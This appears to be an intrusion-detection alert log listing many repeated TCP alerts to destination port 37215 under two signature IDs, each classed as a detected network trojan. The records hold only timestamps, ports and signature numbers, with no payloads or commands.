          Timestamp:06/09/24-16:33:29.289074
          SID:2835222
          Source Port:56718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471887
          SID:2835222
          Source Port:37580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986329
          SID:2835222
          Source Port:46718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478100
          SID:2829579
          Source Port:58018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566487
          SID:2835222
          Source Port:45642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074364
          SID:2829579
          Source Port:48892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287024
          SID:2835222
          Source Port:52692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677183
          SID:2829579
          Source Port:60962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036075
          SID:2835222
          Source Port:51638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558702
          SID:2835222
          Source Port:60472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165498
          SID:2835222
          Source Port:54128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038761
          SID:2835222
          Source Port:55306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472319
          SID:2835222
          Source Port:57130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682027
          SID:2829579
          Source Port:57894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103864
          SID:2829579
          Source Port:38722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861243
          SID:2835222
          Source Port:53362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245435
          SID:2829579
          Source Port:59520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.078269
          SID:2829579
          Source Port:35730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287153
          SID:2835222
          Source Port:50886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946179
          SID:2835222
          Source Port:53358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993224
          SID:2829579
          Source Port:36892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165835
          SID:2835222
          Source Port:60486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.639967
          SID:2835222
          Source Port:54458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395912
          SID:2829579
          Source Port:60584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945894
          SID:2829579
          Source Port:50800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476848
          SID:2835222
          Source Port:57264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538247
          SID:2835222
          Source Port:46452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863726
          SID:2835222
          Source Port:44380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120879
          SID:2829579
          Source Port:49060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558669
          SID:2835222
          Source Port:56560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719835
          SID:2829579
          Source Port:46476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538870
          SID:2835222
          Source Port:32846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821906
          SID:2835222
          Source Port:34612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.995391
          SID:2835222
          Source Port:41692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272396
          SID:2835222
          Source Port:38556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160163
          SID:2829579
          Source Port:52714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033209
          SID:2829579
          Source Port:55800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720732
          SID:2829579
          Source Port:44008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289122
          SID:2829579
          Source Port:34838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398105
          SID:2835222
          Source Port:52276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274881
          SID:2835222
          Source Port:55212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104390
          SID:2829579
          Source Port:57660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929995
          SID:2829579
          Source Port:35192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163467
          SID:2829579
          Source Port:60686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465547
          SID:2835222
          Source Port:48674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820563
          SID:2829579
          Source Port:52178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102612
          SID:2835222
          Source Port:56798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284998
          SID:2835222
          Source Port:42786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.678157
          SID:2835222
          Source Port:39510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158142
          SID:2829579
          Source Port:41558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718735
          SID:2829579
          Source Port:60986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081578
          SID:2829579
          Source Port:41436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931432
          SID:2835222
          Source Port:39066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075680
          SID:2829579
          Source Port:48866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.608066
          SID:2835222
          Source Port:48448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947248
          SID:2829579
          Source Port:33584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821186
          SID:2835222
          Source Port:41426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823444
          SID:2835222
          Source Port:59044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034747
          SID:2835222
          Source Port:46678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596991
          SID:2835222
          Source Port:35220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105373
          SID:2835222
          Source Port:35882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.951367
          SID:2835222
          Source Port:58046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568448
          SID:2835222
          Source Port:33468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034345
          SID:2835222
          Source Port:45856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714191
          SID:2835222
          Source Port:51066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230454
          SID:2829579
          Source Port:46820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103515
          SID:2829579
          Source Port:45076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033262
          SID:2829579
          Source Port:42260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287724
          SID:2829579
          Source Port:33006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032743
          SID:2835222
          Source Port:59896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163882
          SID:2835222
          Source Port:55862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297643
          SID:2829579
          Source Port:36358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165531
          SID:2835222
          Source Port:54688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282329
          SID:2835222
          Source Port:45980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471953
          SID:2829579
          Source Port:39442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644027
          SID:2835222
          Source Port:57260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.078425
          SID:2835222
          Source Port:52638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993595
          SID:2829579
          Source Port:56312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715520
          SID:2829579
          Source Port:58404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038545
          SID:2835222
          Source Port:42776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397886
          SID:2835222
          Source Port:46366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244965
          SID:2835222
          Source Port:47634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713675
          SID:2829579
          Source Port:43604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130902
          SID:2835222
          Source Port:57538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926795
          SID:2835222
          Source Port:56820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129681
          SID:2835222
          Source Port:38580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414351
          SID:2829579
          Source Port:33106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928616
          SID:2835222
          Source Port:48512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164503
          SID:2835222
          Source Port:58098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947305
          SID:2829579
          Source Port:40104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821129
          SID:2835222
          Source Port:47660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226428
          SID:2829579
          Source Port:48104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947975
          SID:2829579
          Source Port:52480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287222
          SID:2835222
          Source Port:48458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102447
          SID:2835222
          Source Port:35058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718403
          SID:2829579
          Source Port:36630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273600
          SID:2835222
          Source Port:32894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004598
          SID:2829579
          Source Port:53780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075273
          SID:2835222
          Source Port:45872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415045
          SID:2835222
          Source Port:55716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598056
          SID:2835222
          Source Port:35982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035555
          SID:2829579
          Source Port:36084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166059
          SID:2829579
          Source Port:59774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819308
          SID:2829579
          Source Port:56910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540018
          SID:2829579
          Source Port:34620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397305
          SID:2829579
          Source Port:53924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226349
          SID:2835222
          Source Port:56688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398662
          SID:2835222
          Source Port:34270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027487
          SID:2835222
          Source Port:37442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924597
          SID:2835222
          Source Port:48324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904609
          SID:2835222
          Source Port:53580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818098
          SID:2835222
          Source Port:59550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224349
          SID:2835222
          Source Port:55960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414118
          SID:2829579
          Source Port:43798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417765
          SID:2835222
          Source Port:49614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292653
          SID:2829579
          Source Port:46602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291289
          SID:2829579
          Source Port:36068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283634
          SID:2835222
          Source Port:42876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931814
          SID:2829579
          Source Port:44220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.992183
          SID:2835222
          Source Port:36980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103631
          SID:2829579
          Source Port:42820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285908
          SID:2829579
          Source Port:39214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167289
          SID:2829579
          Source Port:34360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947151
          SID:2835222
          Source Port:56774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036066
          SID:2835222
          Source Port:39898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475833
          SID:2835222
          Source Port:57752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918041
          SID:2835222
          Source Port:56598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286680
          SID:2829579
          Source Port:47844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469688
          SID:2829579
          Source Port:48804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.899339
          SID:2829579
          Source Port:32962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034811
          SID:2829579
          Source Port:35970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028469
          SID:2835222
          Source Port:37968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.893142
          SID:2829579
          Source Port:53496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600991
          SID:2829579
          Source Port:46526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166067
          SID:2835222
          Source Port:50484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644058
          SID:2835222
          Source Port:51092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567960
          SID:2829579
          Source Port:55570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720414
          SID:2835222
          Source Port:36192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821108
          SID:2829579
          Source Port:46270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076498
          SID:2829579
          Source Port:41916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163984
          SID:2835222
          Source Port:37974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399452
          SID:2835222
          Source Port:43880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289547
          SID:2829579
          Source Port:45582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719620
          SID:2835222
          Source Port:32962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598456
          SID:2835222
          Source Port:33596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225717
          SID:2835222
          Source Port:39532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715204
          SID:2829579
          Source Port:55992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034168
          SID:2835222
          Source Port:33764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243596
          SID:2829579
          Source Port:50608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568160
          SID:2829579
          Source Port:55818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.997746
          SID:2829579
          Source Port:52140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818073
          SID:2835222
          Source Port:36808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245378
          SID:2835222
          Source Port:45072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996746
          SID:2829579
          Source Port:49302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205434
          SID:2835222
          Source Port:48024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993242
          SID:2829579
          Source Port:49076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.988906
          SID:2829579
          Source Port:54884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039072
          SID:2835222
          Source Port:33280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909861
          SID:2829579
          Source Port:41836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272059
          SID:2835222
          Source Port:59540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230044
          SID:2835222
          Source Port:49454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720575
          SID:2835222
          Source Port:49164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395826
          SID:2835222
          Source Port:54910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413650
          SID:2835222
          Source Port:50670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985432
          SID:2829579
          Source Port:57550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074558
          SID:2829579
          Source Port:54784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644602
          SID:2829579
          Source Port:55260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157365
          SID:2829579
          Source Port:55646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994418
          SID:2829579
          Source Port:35412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902065
          SID:2829579
          Source Port:44536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719547
          SID:2829579
          Source Port:35750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399504
          SID:2829579
          Source Port:34110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.955776
          SID:2829579
          Source Port:56896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895901
          SID:2829579
          Source Port:54138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274788
          SID:2829579
          Source Port:45840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205650
          SID:2829579
          Source Port:52072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987456
          SID:2835222
          Source Port:60656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206067
          SID:2835222
          Source Port:41828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552861
          SID:2835222
          Source Port:33978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950374
          SID:2829579
          Source Port:57100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.858836
          SID:2829579
          Source Port:56676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157115
          SID:2835222
          Source Port:57514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160184
          SID:2835222
          Source Port:52020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163967
          SID:2829579
          Source Port:37858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490311
          SID:2829579
          Source Port:54564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161119
          SID:2829579
          Source Port:48694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540316
          SID:2829579
          Source Port:47992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820891
          SID:2835222
          Source Port:54010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563182
          SID:2835222
          Source Port:47384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861187
          SID:2829579
          Source Port:34464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539643
          SID:2835222
          Source Port:45080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415984
          SID:2835222
          Source Port:46172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418370
          SID:2835222
          Source Port:53422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719991
          SID:2835222
          Source Port:43646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863374
          SID:2829579
          Source Port:54074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989936
          SID:2835222
          Source Port:52300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929814
          SID:2835222
          Source Port:47354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563529
